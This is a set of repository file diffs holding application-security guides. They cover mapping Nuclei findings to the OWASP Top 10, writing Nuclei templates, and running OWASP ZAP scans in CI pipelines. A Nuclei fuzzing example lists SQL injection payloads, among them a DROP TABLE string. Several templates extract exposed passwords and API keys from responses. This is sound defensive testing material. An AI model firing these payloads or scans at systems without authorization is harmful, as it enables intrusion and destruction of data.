- **CORS Misconfiguration**: `Access-Control-Allow-Origin: *`
- **Debug Mode Enabled**: Stack traces, verbose errors in production
- **Default Configurations**: Unchanged default credentials and settings
- **Directory Indexing**: Apache/Nginx directory listing enabled
### Remediation Priority
**Medium** - Apply hardening configurations and remove debug modes
## A06:2021 - Vulnerable and Outdated Components
### Nuclei Template Tags
- `cve` - Known CVE vulnerabilities
- `eol` - End-of-life software
- `outdated` - Outdated software versions
### Common Findings
- **Known CVEs**: Outdated libraries with public CVEs (Log4Shell, Spring4Shell, etc.)
- **End-of-Life Software**: Unsupported versions of frameworks and libraries
- **Vulnerable JavaScript Libraries**: jQuery, Angular, React with known vulnerabilities
- **CMS Vulnerabilities**: WordPress, Drupal, Joomla plugin vulnerabilities
### Remediation Priority
**Critical to High** - Patch immediately based on CVSS score and exploitability
### Example CVE Mappings
```
CVE-2021-44228 (Log4Shell) → Critical → A06
CVE-2022-22965 (Spring4Shell) → Critical → A06
CVE-2017-5638 (Struts2 RCE) → Critical → A06
CVE-2021-26855 (Exchange ProxyLogon) → Critical → A06
```
## A07:2021 - Identification and Authentication Failures
### Nuclei Template Tags
- `auth` - Authentication issues
- `jwt` - JWT vulnerabilities
- `oauth` - OAuth misconfigurations
- `default-logins` - Default credentials
- `session` - Session management issues
### Common Findings
- **Default Credentials**: Admin/admin, root/root, default passwords
- **Weak Password Policies**: No complexity requirements
- **Session Fixation**: Session tokens not regenerated after login
- **JWT Vulnerabilities**: `alg=none` bypass, weak signing keys
- **Missing MFA**: No multi-factor authentication for privileged accounts
- **Predictable Session IDs**: Sequential or easily guessable tokens
### Remediation Priority
**High** - Change default credentials immediately, enforce strong password policies
## A08:2021 - Software and Data Integrity Failures
### Nuclei Template Tags
- `rce` - Remote Code Execution
- `deserialization` - Insecure deserialization
- `integrity` - Integrity check failures
### Common Findings
- **Insecure Deserialization**: Unsafe object deserialization in Java, Python, PHP
- **Unsigned Updates**: Software updates without signature verification
- **CI/CD Pipeline Compromise**: Insufficient pipeline security controls
- **Dependency Confusion**: Private packages replaced by public malicious packages
### Remediation Priority
**Critical** - Insecure deserialization leading to RCE requires immediate action
## A09:2021 - Security Logging and Monitoring Failures
### Nuclei Template Tags
- `logging` - Logging issues
- `monitoring` - Monitoring gaps
### Common Findings
- **Missing Audit Logs**: Authentication failures, access control violations not logged
- **Insufficient Log Retention**: Logs deleted too quickly for forensic analysis
- **No Alerting**: No real-time alerts for suspicious activities
- **Log Injection**: User input reflected in logs without sanitization
### Remediation Priority
**Low to Medium** - Improve logging and monitoring infrastructure
## A10:2021 - Server-Side Request Forgery (SSRF)
### Nuclei Template Tags
- `ssrf` - SSRF vulnerabilities
- `redirect` - Open redirect issues
### Common Findings
- **SSRF via URL Parameters**: User-controlled URLs fetched by server
- **Cloud Metadata Access**: SSRF accessing AWS/GCP/Azure metadata endpoints
- **Internal Port Scanning**: SSRF used to scan internal networks
- **Webhook Vulnerabilities**: SSRF via webhook URLs
### Remediation Priority
**High to Critical** - Especially if cloud metadata or internal services accessible
## Severity Mapping Guide
Use this table to map Nuclei severity levels to OWASP categories:
| Nuclei Severity | OWASP Priority | Action Required |
|-----------------|----------------|-----------------|
| **Critical** | P0 - Immediate | Patch within 24 hours |
| **High** | P1 - Urgent | Patch within 7 days |
| **Medium** | P2 - Important | Patch within 30 days |
| **Low** | P3 - Normal | Patch in next release cycle |
| **Info** | P4 - Informational | Document and track |
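To feed this table, severity counts can be pulled straight from nuclei's JSONL output; the sketch below assumes the JSONL export, where severity sits under `.info.severity`.
```bash
# Count findings per severity to drive the priority table above
jq -r '.info.severity' nuclei-results.jsonl | sort | uniq -c | sort -rn
```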
## Integration with Security Workflows
### Finding Triage Process
1. **Critical/High Findings**: Assign to security team immediately
2. **Verify Exploitability**: Confirm with manual testing
3. **Map to OWASP**: Use this guide to categorize findings
4. **Assign Remediation Owner**: Development team or infrastructure team
5. **Track in JIRA/GitHub**: Create tickets with OWASP category labels (see the GitHub CLI sketch after this list)
6. **Re-scan After Fix**: Verify vulnerability is resolved
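A minimal sketch of step 5 using the GitHub CLI is shown below; the repository name and labels are placeholders, and it assumes nuclei JSONL output with `template-id`, `matched-at`, and `info.description` fields.
```bash
# Create one issue per critical/high finding (placeholder repository and labels)
jq -c 'select(.info.severity == "critical" or .info.severity == "high")' nuclei-results.jsonl |
while read -r finding; do
  name=$(echo "$finding" | jq -r '."template-id"')
  url=$(echo "$finding" | jq -r '."matched-at"')
  description=$(echo "$finding" | jq -r '.info.description // "See nuclei output for details."')
  gh issue create \
    --repo acme/appsec-findings \
    --title "[$name] $url" \
    --body "$description" \
    --label security \
    --label automated-scan
done
```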
### Reporting Template
```markdown
## Security Finding: [Nuclei Template ID]
**OWASP Category**: A03:2021 - Injection
**Severity**: Critical
**CWE**: CWE-89 (SQL Injection)
**CVE**: CVE-2024-XXXXX (if applicable)
### Description
[Description from Nuclei output]
### Affected URLs
- https://target-app.com/api/users?id=1
### Remediation
Use parameterized queries instead of string concatenation.
### References
- [OWASP SQL Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)
```
## Additional Resources
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/)
- [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)

View File

@@ -0,0 +1,637 @@
# Nuclei Template Development Guide
## Table of Contents
- [Template Structure](#template-structure)
- [Template Types](#template-types)
- [Matchers and Extractors](#matchers-and-extractors)
- [Advanced Techniques](#advanced-techniques)
- [Testing and Validation](#testing-and-validation)
- [Best Practices](#best-practices)
## Template Structure
### Basic Template Anatomy
```yaml
id: unique-template-id
info:
name: Human-readable template name
author: your-name
severity: critical|high|medium|low|info
description: Detailed description of what this template detects
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-XXXXX
- https://nvd.nist.gov/vuln/detail/CVE-2024-XXXXX
tags: cve,owasp,misconfig,custom
# Template type: http, dns, network, file, etc.
http:
- method: GET
path:
- "{{BaseURL}}/vulnerable-endpoint"
matchers:
- type: status
status:
- 200
- type: word
words:
- "vulnerable signature"
```
### Required Fields
- **id**: Unique identifier (kebab-case, organization-scoped for custom templates)
- **info.name**: Clear, descriptive name
- **info.author**: Template author
- **info.severity**: One of: critical, high, medium, low, info
- **info.description**: What vulnerability this detects
- **info.tags**: Searchable tags for filtering
### Optional but Recommended Fields
- **info.reference**: Links to CVE, advisories, documentation
- **info.classification**: CWE, CVE, OWASP mappings
- **info.metadata**: Additional metadata (max-request, verified, etc.)
## Template Types
### HTTP Templates
Most common template type for web application testing:
```yaml
id: http-example
info:
name: HTTP Template Example
author: security-team
severity: high
tags: web,http
http:
- method: GET
path:
- "{{BaseURL}}/api/users"
- "{{BaseURL}}/api/admin"
headers:
Authorization: "Bearer {{token}}"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "\"role\":\"admin\""
- "sensitive_data"
extractors:
- type: regex
name: user_ids
regex:
- '"id":([0-9]+)'
```
### DNS Templates
Test for DNS misconfigurations and subdomain takeovers:
```yaml
id: dns-takeover-check
info:
name: DNS Subdomain Takeover Detection
author: security-team
severity: high
tags: dns,takeover
dns:
- name: "{{FQDN}}"
type: CNAME
matchers:
- type: word
words:
- "amazonaws.com"
- "azurewebsites.net"
- "herokuapp.com"
```
### Network Templates
TCP/UDP port scanning and service detection:
```yaml
id: exposed-redis
info:
name: Exposed Redis Instance
author: security-team
severity: critical
tags: network,redis,exposure
network:
- inputs:
- data: "*1\r\n$4\r\ninfo\r\n"
host:
- "{{Hostname}}"
- "{{Hostname}}:6379"
matchers:
- type: word
words:
- "redis_version"
```
## Matchers and Extractors
### Matcher Types
#### Status Matcher
```yaml
matchers:
- type: status
status:
- 200
- 201
condition: or
```
#### Word Matcher
```yaml
matchers:
- type: word
part: body # body, header, all
words:
- "error"
- "exception"
condition: and
case-insensitive: true
```
#### Regex Matcher
```yaml
matchers:
- type: regex
regex:
- "(?i)password\\s*=\\s*['\"]([^'\"]+)['\"]"
part: body
```
#### Binary Matcher
```yaml
matchers:
- type: binary
binary:
- "504B0304" # ZIP file signature (hex)
part: body
```
#### DSL Matcher (Dynamic Expressions)
```yaml
matchers:
- type: dsl
dsl:
- "status_code == 200 && len(body) > 1000"
- "contains(tolower(body), 'admin')"
```
### Matcher Conditions
- **and**: All matchers must match
- **or**: At least one matcher must match (default)
```yaml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "admin"
```
### Extractors
Extract data from responses for reporting or chaining:
#### Regex Extractor
```yaml
extractors:
- type: regex
name: api_keys
part: body
regex:
- 'api[_-]?key["\s:=]+([a-zA-Z0-9_-]{32,})'
group: 1
```
#### JSON Extractor
```yaml
extractors:
- type: json
name: user_data
json:
- ".users[].email"
- ".users[].id"
```
#### XPath Extractor
```yaml
extractors:
- type: xpath
name: titles
xpath:
- "//title"
```
## Advanced Techniques
### Request Chaining (Workflows)
Execute templates in sequence, passing data between them:
```yaml
id: workflow-example
info:
name: Multi-Step Authentication Test
author: security-team
workflows:
templates:
- template: login.yaml
- template: fetch-user-data.yaml
```
**login.yaml**:
```yaml
id: login-template
info:
name: Login and Extract Token
author: security-team
severity: info
http:
- method: POST
path:
- "{{BaseURL}}/api/login"
body: '{"username":"test","password":"test"}'
extractors:
- type: json
name: auth_token
json:
- ".token"
internal: true # Pass to next template
```
### Variables and Helpers
Use dynamic variables and helper functions:
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/api/users/{{username}}"
# Available variables:
# {{BaseURL}}, {{Hostname}}, {{Host}}, {{Port}}, {{Path}}
# {{RootURL}}, {{Scheme}}, {{username}} (from previous extractor)
matchers:
- type: dsl
dsl:
# Helper functions: len(), contains(), regex_match(), etc.
- 'len(body) > 500'
- 'contains(tolower(header), "x-api-key")'
- 'status_code >= 200 && status_code < 300'
```
### Payloads and Fuzzing
Use payload files for fuzzing:
```yaml
id: sqli-fuzzing
info:
name: SQL Injection Fuzzing
author: security-team
severity: critical
http:
- method: GET
path:
- "{{BaseURL}}/api/users?id={{payload}}"
payloads:
payload:
- "1' OR '1'='1"
- "1' UNION SELECT NULL--"
- "'; DROP TABLE users--"
matchers:
- type: word
words:
- "SQL syntax"
- "mysql_fetch"
- "ORA-01756"
```
Or use external payload file:
```yaml
payloads:
payload: payloads/sql-injection.txt
attack: clusterbomb # pitchfork, clusterbomb, batteringram
```
### Rate Limiting and Threads
Control request rate to avoid overwhelming targets:
```yaml
id: rate-limited-scan
info:
name: Rate-Limited Vulnerability Scan
author: security-team
severity: medium
metadata:
max-request: 50 # Maximum requests per template execution
http:
- method: GET
path:
- "{{BaseURL}}/api/endpoint"
threads: 5 # Concurrent requests (default: 25)
```
## Testing and Validation
### Local Testing
Test templates against local test servers:
```bash
# Test single template
nuclei -t custom-templates/my-template.yaml -u http://localhost:8080 -debug
# Validate template syntax
nuclei -t custom-templates/my-template.yaml -validate
# Test with verbose output
nuclei -t custom-templates/my-template.yaml -u https://target.com -verbose
```
### Template Validation
Use the bundled validation script:
```bash
python3 scripts/template_validator.py custom-templates/my-template.yaml
```
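Beyond the bundled script, nuclei's own `-validate` flag can gate an entire directory of custom templates (for example in CI); a minimal sketch follows, with the directory path as a placeholder.
```bash
#!/bin/bash
# Validate every custom template with nuclei's built-in -validate and report any rejects
set -euo pipefail
status=0
while IFS= read -r -d '' template; do
  if ! nuclei -t "$template" -validate >/dev/null 2>&1; then
    echo "INVALID: $template"
    status=1
  fi
done < <(find custom-templates/ -name '*.yaml' -print0)
exit "$status"
```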
### Test Lab Setup
Create a vulnerable test application for template development:
```bash
# Use DVWA (Damn Vulnerable Web Application)
docker run -d -p 80:80 vulnerables/web-dvwa
# Or OWASP Juice Shop
docker run -d -p 3000:3000 bkimminich/juice-shop
```
## Best Practices
### 1. Accurate Severity Classification
- **Critical**: RCE, authentication bypass, full system compromise
- **High**: SQL injection, XSS, significant data exposure
- **Medium**: Missing security headers, information disclosure
- **Low**: Minor misconfigurations, best practice violations
- **Info**: Technology detection, non-security findings
### 2. Minimize False Positives
```yaml
# Use multiple matchers with AND condition
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "admin"
- "dashboard"
condition: and
- type: regex
regex:
- '(?i)<title>.*Admin.*Panel.*</title>' # (?i) keeps the match case-insensitive within the regex itself
```
### 3. Clear Naming Conventions
- **id**: `organization-vulnerability-type-identifier`
- Example: `acme-api-key-exposure-config`
- **name**: Descriptive, clear purpose
- Example: "ACME Corp API Key Exposure in Config Endpoint"
### 4. Comprehensive Documentation
```yaml
info:
name: Detailed Template Name
description: |
Comprehensive description of what this template detects,
why it's important, and how it works.
References:
- CVE-2024-XXXXX
- Internal ticket: SEC-1234
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-XXXXX
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-XXXXX
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-XXXXX
cwe-id: CWE-89
metadata:
verified: true
max-request: 10
shodan-query: 'http.title:"Admin Panel"'
tags: cve,owasp,sqli,high-severity,verified
```
### 5. Responsible Testing Parameters
```yaml
# Avoid aggressive fuzzing in default templates
info:
metadata:
max-request: 10 # Limit total requests
http:
- method: GET
threads: 5 # Limit concurrent requests
# Use specific, targeted payloads
payloads:
test: ["safe-payload-1", "safe-payload-2"]
```
### 6. Error Handling
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/api/test"
# Handle various response scenarios
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body, 'vulnerable')"
- "status_code == 500 && contains(body, 'error')"
condition: or
# Negative matchers (must NOT match)
matchers:
- type: word
negative: true
words:
- "404 Not Found"
- "403 Forbidden"
```
### 7. Template Organization
```
custom-templates/
├── api/
│ ├── api-key-exposure.yaml
│ ├── graphql-introspection.yaml
│ └── rest-api-misconfig.yaml
├── cves/
│ ├── 2024/
│ │ ├── CVE-2024-12345.yaml
│ │ └── CVE-2024-67890.yaml
├── exposures/
│ ├── sensitive-files.yaml
│ └── backup-exposure.yaml
└── misconfig/
├── cors-misconfiguration.yaml
└── debug-mode-enabled.yaml
```
### 8. Version Control and Maintenance
- Use Git to track template changes
- Tag templates with version numbers in metadata
- Document changes in template comments
- Regularly test templates against updated applications
```yaml
info:
metadata:
version: 1.2.0
last-updated: 2024-11-20
changelog: |
1.2.0 - Added additional matcher for new vulnerability variant
1.1.0 - Improved regex pattern to reduce false positives
1.0.0 - Initial release
```
## Example: Complete Custom Template
```yaml
id: acme-corp-api-debug-exposure
info:
name: ACME Corp API Debug Endpoint Exposure
author: acme-security-team
severity: high
description: |
Detects exposed debug endpoint in ACME Corp API that leaks
sensitive configuration including database credentials,
API keys, and internal service URLs.
reference:
- https://internal-wiki.acme.com/security/SEC-1234
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-200
metadata:
verified: true
max-request: 3
version: 1.0.0
tags: acme,api,exposure,debug,high-severity
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/debug/config"
- "{{BaseURL}}/api/v2/debug/config"
- "{{BaseURL}}/debug/config"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "database_url"
- "api_secret_key"
condition: or
- type: regex
part: body
regex:
- '"(password|secret|token)":\s*"[^"]+"'
extractors:
- type: regex
name: exposed_secrets
part: body
regex:
- '"(database_url|api_secret_key|jwt_secret)":\s*"([^"]+)"'
group: 2
- type: json
name: config_data
json:
- ".database_url"
- ".api_secret_key"
```
## Resources
- [Official Nuclei Template Guide](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)
- [Template Editor](https://templates.nuclei.sh/)
- [DSL Functions Reference](https://docs.projectdiscovery.io/templates/reference/matchers#dsl-matcher)

View File

@@ -0,0 +1,444 @@
---
name: dast-zap
description: >
Dynamic application security testing (DAST) using OWASP ZAP (Zed Attack Proxy) with passive and active scanning,
API testing, and OWASP Top 10 vulnerability detection. Use when: (1) Performing runtime security testing of web
applications and APIs, (2) Detecting vulnerabilities like XSS, SQL injection, and authentication flaws in deployed
applications, (3) Automating security scans in CI/CD pipelines with Docker containers, (4) Conducting authenticated
testing with session management, (5) Generating security reports with OWASP and CWE mappings for compliance.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [dast, zap, web-security, owasp, vulnerability-scanning, api-testing, penetration-testing]
frameworks: [OWASP, CWE]
dependencies:
tools: [docker]
optional: [python3, java]
references:
- https://www.zaproxy.org/docs/
- https://www.zaproxy.org/docs/docker/
- https://www.zaproxy.org/docs/desktop/start/features/
---
# DAST with OWASP ZAP
## Overview
OWASP ZAP (Zed Attack Proxy) is an open-source DAST tool that acts as a manipulator-in-the-middle proxy to intercept,
inspect, and test web application traffic for security vulnerabilities. ZAP provides automated passive and active
scanning, API testing capabilities, and seamless CI/CD integration for runtime security testing.
## Quick Start
### Baseline Scan (Docker)
Run a quick passive security scan:
```bash
docker run -t zaproxy/zap-stable zap-baseline.py -t https://target-app.com -r baseline-report.html
```
### Full Active Scan (Docker)
Perform comprehensive active vulnerability testing:
```bash
docker run -t zaproxy/zap-stable zap-full-scan.py -t https://target-app.com -r full-scan-report.html
```
### API Scan with OpenAPI Spec
Test APIs using OpenAPI/Swagger specification:
```bash
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com \
-f openapi \
-d /zap/wrk/openapi-spec.yaml \
-r /zap/wrk/api-report.html
```
## Core Workflow
### Step 1: Define Scan Scope and Target
Identify the target application URL and define scope:
```bash
# Set target URL
TARGET_URL="https://target-app.com"
# For authenticated scans, prepare authentication context
# See references/authentication_guide.md for detailed setup
```
**Scope Considerations:**
- Exclude third-party domains and CDN URLs
- Include all application subdomains and API endpoints
- Respect scope limitations in penetration testing engagements
### Step 2: Run Passive Scanning
Execute passive scanning to analyze traffic without active attacks:
```bash
# Baseline scan performs spidering + passive scanning
docker run -t zaproxy/zap-stable zap-baseline.py \
-t $TARGET_URL \
-r baseline-report.html \
-J baseline-report.json
```
**What Passive Scanning Detects:**
- Missing security headers (CSP, HSTS, X-Frame-Options)
- Information disclosure in responses
- Cookie security issues (HttpOnly, Secure flags)
- Basic authentication weaknesses
- Application fingerprinting data
### Step 3: Execute Active Scanning
Perform active vulnerability testing (requires authorization):
```bash
# Full scan includes spidering + passive + active scanning
docker run -t zaproxy/zap-stable zap-full-scan.py \
-t $TARGET_URL \
-r full-scan-report.html \
-J full-scan-report.json \
-z "-config api.addrs.addr.name=.* -config api.addrs.addr.regex=true"
```
**Active Scanning Coverage:**
- SQL Injection (SQLi)
- Cross-Site Scripting (XSS)
- Path Traversal
- Command Injection
- XML External Entity (XXE)
- Server-Side Request Forgery (SSRF)
- Security Misconfigurations
**WARNING:** Active scanning performs real attacks. Only run against applications you have explicit authorization to test.
### Step 4: Test APIs with Specifications
Scan REST, GraphQL, and SOAP APIs:
```bash
# OpenAPI/Swagger API scan
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com \
-f openapi \
-d /zap/wrk/openapi.yaml \
-r /zap/wrk/api-report.html
# GraphQL API scan
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com/graphql \
-f graphql \
-d /zap/wrk/schema.graphql \
-r /zap/wrk/graphql-report.html
```
Consult `references/api_testing_guide.md` for advanced API testing patterns including authentication and rate limiting.
### Step 5: Handle Authentication
For testing authenticated application areas:
```bash
# Use bundled script for authentication setup
python3 scripts/zap_auth_scanner.py \
--target $TARGET_URL \
--auth-type form \
--login-url https://target-app.com/login \
--username testuser \
--password-env ZAP_AUTH_PASSWORD \
--output auth-scan-report.html
```
Authentication methods supported:
- Form-based authentication
- HTTP Basic/Digest authentication
- OAuth 2.0 flows
- API key/token authentication
- Script-based custom authentication
See `references/authentication_guide.md` for detailed authentication configuration.
### Step 6: Analyze Results and Generate Reports
Review findings by risk level:
```bash
# Generate multiple report formats
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-full-scan.py \
-t $TARGET_URL \
-r /zap/wrk/report.html \
-J /zap/wrk/report.json \
-x /zap/wrk/report.xml
```
**Risk Levels:**
- **High**: Critical vulnerabilities requiring immediate remediation (SQLi, RCE, authentication bypass)
- **Medium**: Significant security weaknesses (XSS, CSRF, sensitive data exposure)
- **Low**: Security concerns with lower exploitability (information disclosure, minor misconfigurations)
- **Informational**: Security best practices and observations
Map findings to OWASP Top 10 using `references/owasp_mapping.md`.
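As a quick triage aid, high-risk alerts can be pulled from the JSON report with `jq`. The sketch below assumes ZAP's traditional JSON layout, where alerts live under `.site[].alerts[]` and `riskdesc` values look like `High (Medium)`.
```bash
# List high-risk alerts with their risk/confidence description
jq -r '.site[].alerts[] | select(.riskdesc | startswith("High")) | "\(.riskdesc)\t\(.name // .alert)"' report.json
```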
## Automation & CI/CD Integration
### GitHub Actions Integration
Add ZAP scanning to GitHub workflows:
```yaml
# .github/workflows/zap-scan.yml
name: ZAP Security Scan
on: [push, pull_request]
jobs:
zap_scan:
runs-on: ubuntu-latest
name: OWASP ZAP Baseline Scan
steps:
- name: Checkout
uses: actions/checkout@v2
- name: ZAP Baseline Scan
uses: zaproxy/action-baseline@v0.7.0
with:
target: 'https://staging.target-app.com'
rules_file_name: '.zap/rules.tsv'
cmd_options: '-a'
```
### Docker Automation Framework
Use YAML-based automation for advanced workflows:
```bash
# Create automation config (see assets/zap_automation.yaml)
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable \
zap.sh -cmd -autorun /zap/wrk/zap_automation.yaml
```
The bundled `assets/zap_automation.yaml` template includes:
- Environment configuration
- Spider and AJAX spider settings
- Passive and active scan policies
- Authentication configuration
- Report generation
### CI/CD Best Practices
- Use **baseline scans** for every commit/PR (low false positives)
- Run **full scans** on staging environments before production deployment
- Configure **API scans** for microservices and REST endpoints
- Set **failure thresholds** to break builds on high-severity findings
- Generate **SARIF reports** for GitHub Security tab integration
See `scripts/ci_integration.sh` for complete CI/CD integration examples.
## Security Considerations
- **Authorization**: Always obtain written authorization before scanning production systems or third-party applications
- **Rate Limiting**: Configure scan speed to avoid overwhelming target applications or triggering DDoS protections
- **Sensitive Data**: Never include production credentials in scan configurations; use environment variables or secrets management
- **Scan Timing**: Run active scans during maintenance windows or against dedicated testing environments
- **Legal Compliance**: Adhere to computer fraud and abuse laws; unauthorized scanning may be illegal
- **Audit Logging**: Log all scan executions, targets, findings, and remediation actions for compliance audits
- **Data Retention**: Sanitize scan reports before sharing; they may contain sensitive application data
- **False Positives**: Manually verify findings before raising security incidents; DAST tools generate false positives
## Bundled Resources
### Scripts (`scripts/`)
- `zap_baseline_scan.sh` - Automated baseline scanning with configurable targets and reporting
- `zap_full_scan.sh` - Comprehensive active scanning with exclusion rules
- `zap_api_scan.py` - API testing with OpenAPI/GraphQL specification support
- `zap_auth_scanner.py` - Authenticated scanning with multiple authentication methods
- `ci_integration.sh` - CI/CD integration examples for Jenkins, GitLab CI, GitHub Actions
### References (`references/`)
- `authentication_guide.md` - Complete authentication configuration for form-based, OAuth, and token authentication
- `owasp_mapping.md` - Mapping of ZAP alerts to OWASP Top 10 2021 and CWE classifications
- `api_testing_guide.md` - Advanced API testing patterns for REST, GraphQL, SOAP, and WebSocket
- `scan_policies.md` - Custom scan policy configuration for different application types
- `false_positive_handling.md` - Common false positives and verification techniques
### Assets (`assets/`)
- `zap_automation.yaml` - Automation framework configuration template
- `zap_context.xml` - Context configuration with authentication and session management
- `scan_policy_modern_web.policy` - Scan policy optimized for modern JavaScript applications
- `scan_policy_api.policy` - Scan policy for REST and GraphQL APIs
- `github_action.yml` - GitHub Actions workflow template
- `gitlab_ci.yml` - GitLab CI pipeline template
## Common Patterns
### Pattern 1: Progressive Scanning (Speed vs. Coverage)
Start with fast scans and progressively increase depth:
```bash
# Stage 1: Quick baseline scan (5-10 minutes)
docker run -t zaproxy/zap-stable zap-baseline.py -t $TARGET_URL -r baseline.html
# Stage 2: Full spider + passive scan (15-30 minutes)
docker run -t zaproxy/zap-stable zap-baseline.py -t $TARGET_URL -r baseline.html -c baseline-rules.tsv
# Stage 3: Targeted active scan on critical endpoints (1-2 hours)
docker run -t zaproxy/zap-stable zap-full-scan.py -t $TARGET_URL -r full.html -c full-rules.tsv
```
### Pattern 2: API-First Testing
Prioritize API security testing:
```bash
# 1. Test API endpoints with specification
docker run -v $(pwd):/zap/wrk/:rw -t zaproxy/zap-stable zap-api-scan.py \
-t https://api.target.com -f openapi -d /zap/wrk/openapi.yaml -r /zap/wrk/api.html
# 2. Run active scan on discovered API endpoints
# (ZAP automatically includes spidered API routes)
# 3. Test authentication flows
python3 scripts/zap_auth_scanner.py --target https://api.target.com --auth-type bearer --token-env API_TOKEN
```
### Pattern 3: Authenticated Web Application Testing
Test complete application including protected areas:
```bash
# 1. Configure authentication context
# See assets/zap_context.xml for template
# 2. Run authenticated scan
python3 scripts/zap_auth_scanner.py \
--target https://app.target.com \
--auth-type form \
--login-url https://app.target.com/login \
--username testuser \
--password-env APP_PASSWORD \
--verification-url https://app.target.com/dashboard \
--output authenticated-scan.html
# 3. Review session-specific vulnerabilities (CSRF, privilege escalation)
```
### Pattern 4: CI/CD Security Gate
Implement ZAP as a security gate in deployment pipelines:
```bash
# Run baseline scan and fail build on high-risk findings
docker run -t zaproxy/zap-stable zap-baseline.py \
-t https://staging.target.com \
-r baseline-report.html \
-J baseline-report.json
# Note: zap-baseline.py's --hook option expects a Python hooks file if you need to customize scan behaviour;
# see scripts/ci_integration.sh for shell wrapper examples instead.
# Check exit code
if [ $? -ne 0 ]; then
echo "Security scan failed! High-risk vulnerabilities detected."
exit 1
fi
```
## Integration Points
- **CI/CD**: GitHub Actions, GitLab CI, Jenkins, Azure DevOps, CircleCI
- **Issue Tracking**: Jira, GitHub Issues (via SARIF), ServiceNow
- **Security Tools**: Defect Dojo (vulnerability management), SonarQube, OWASP Dependency-Check
- **SDLC**: Pre-production testing phase, security regression testing, penetration testing preparation
- **Authentication**: Integrates with OAuth providers, SAML, API gateways, custom authentication scripts
- **Reporting**: HTML, JSON, XML, Markdown, SARIF (for GitHub Security), PDF (via custom scripts)
## Troubleshooting
### Issue: Docker Container Cannot Reach Target Application
**Solution**: For scanning applications running on localhost or in other containers:
```bash
# Scanning host application from Docker container
# Use docker0 bridge IP instead of localhost
HOST_IP=$(ip -4 addr show docker0 | grep -Po 'inet \K[\d.]+')
docker run -t zaproxy/zap-stable zap-baseline.py -t http://$HOST_IP:8080
# Scanning between containers - create shared network
docker network create zap-network
docker run --network zap-network -t zaproxy/zap-stable zap-baseline.py -t http://app-container:8080
```
### Issue: Scan Completes Too Quickly (Incomplete Coverage)
**Solution**: Increase spider depth and scan duration:
```bash
# Configure spider to crawl deeper
docker run -t zaproxy/zap-stable zap-baseline.py \
-t $TARGET_URL \
-r report.html \
-z "-config spider.maxDepth=10 -config spider.maxDuration=60"
```
For JavaScript-heavy applications, use AJAX spider or Automation Framework.
### Issue: High False Positive Rate
**Solution**: Create custom scan policy and rules file:
```bash
# Use bundled false positive handling guide
# See references/false_positive_handling.md
# Generate rules file to suppress false positives
# Format (tab-separated): rule_id<TAB>IGNORE|WARN|FAIL<TAB>optional comment
printf '10202\tIGNORE\t(verified false positive on static assets)\n' >> .zap/rules.tsv
docker run -t zaproxy/zap-stable zap-baseline.py -t $TARGET_URL -c .zap/rules.tsv
```
### Issue: Authentication Session Expires During Scan
**Solution**: Configure session re-authentication:
```bash
# Use bundled authentication script with session monitoring
python3 scripts/zap_auth_scanner.py \
--target $TARGET_URL \
--auth-type form \
--login-url https://target.com/login \
--username testuser \
--password-env PASSWORD \
--re-authenticate-on 401,403 \
--verification-interval 300
```
### Issue: Scan Triggering Rate Limiting or WAF Blocking
**Solution**: Reduce scan aggressiveness:
```bash
# Slower scan with delays between requests
docker run -t zaproxy/zap-stable zap-baseline.py \
-t $TARGET_URL \
-r report.html \
-z "-config scanner.threadPerHost=1 -config scanner.delayInMs=1000"
```
## References
- [OWASP ZAP Documentation](https://www.zaproxy.org/docs/)
- [ZAP Docker Documentation](https://www.zaproxy.org/docs/docker/)
- [OWASP Top 10 2021](https://owasp.org/Top10/)
- [ZAP Automation Framework](https://www.zaproxy.org/docs/automate/automation-framework/)
- [GitHub Actions for ZAP](https://github.com/zaproxy/action-baseline)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,207 @@
# GitHub Actions Workflow for OWASP ZAP Security Scanning
# Place this file in .github/workflows/zap-security-scan.yml
name: OWASP ZAP Security Scan
on:
push:
branches: [main, develop]
pull_request:
branches: [main]
schedule:
# Run weekly security scans on Sunday at 2 AM
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual triggering
permissions:
contents: read
security-events: write # For uploading SARIF reports
issues: write # For creating security issues
jobs:
zap-baseline-scan:
name: ZAP Baseline Scan (PR/Push)
runs-on: ubuntu-latest
if: github.event_name == 'pull_request' || github.event_name == 'push'
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Run ZAP Baseline Scan
uses: zaproxy/action-baseline@v0.10.0
with:
target: ${{ secrets.STAGING_URL }}
rules_file_name: '.zap/rules.tsv'
